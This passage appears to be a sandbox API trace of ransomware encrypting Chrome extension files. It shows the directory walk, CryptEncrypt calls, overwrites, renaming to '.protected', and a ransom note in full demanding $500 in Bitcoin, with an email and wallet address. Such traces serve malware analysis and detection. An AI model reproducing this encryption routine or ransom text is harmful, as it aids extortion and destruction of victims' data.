returned 164 [0083.510] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.510] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.524] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.524] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.524] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.524] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.558] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.558] CloseHandle (hObject=0x168) returned 1 [0083.558] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.protected") returned 174 [0083.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json.protected")) returned 1 [0083.559] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.559] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.559] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\RESTORE_FILES.txt") returned 168 [0083.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.560] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.560] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.561] lstrlenA (lpString="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") returned 684 [0083.561] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0083.561] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.561] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.561] CloseHandle (hObject=0x164) returned 1 [0083.561] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.561] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0083.561] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0083.561] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0083.561] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0083.561] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0083.561] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil") returned 151 [0083.561] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0083.561] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0083.561] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\*") returned 153 [0083.561] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0083.562] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.562] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.562] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.562] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.562] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\.") returned 153 [0083.562] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.562] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.562] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.562] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.562] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.562] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.562] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\..") returned 154 [0083.562] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.562] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.562] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.562] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.562] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.562] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0083.562] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.562] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.562] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json") returned 165 [0083.562] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.562] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.562] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.563] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.566] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json") returned 165 [0083.566] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.566] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json") returned 165 [0083.566] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.566] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json") returned 165 [0083.566] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.566] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.568] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.568] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.568] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.568] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.569] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.569] CloseHandle (hObject=0x168) returned 1 [0083.569] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.protected") returned 175 [0083.569] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.protected")) returned 1 [0083.570] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.570] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.570] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\RESTORE_FILES.txt") returned 169 [0083.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.571] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.571] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.571] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.571] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.572] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.572] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.572] CloseHandle (hObject=0x164) returned 1 [0083.572] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.572] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0083.572] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0083.572] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0083.572] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0083.572] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0083.572] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr") returned 150 [0083.572] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0083.572] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0083.572] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\*") returned 152 [0083.572] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.572] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.572] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.572] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.572] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.572] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.572] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\.") returned 152 [0083.573] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.573] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.573] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.573] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.573] lstrcmpiW (lpString1="..", lpString2="Program 
Files (x86)") returned -1 [0083.573] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.573] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.573] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\..") returned 153 [0083.573] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.573] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.573] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.573] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.573] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.573] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.573] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.573] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.573] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json") returned 164 [0083.574] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.574] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.574] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.574] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.574] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.574] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json") returned 164 [0083.574] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.574] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json") returned 164 [0083.574] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.574] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json") returned 164 [0083.574] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.574] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.576] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.576] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
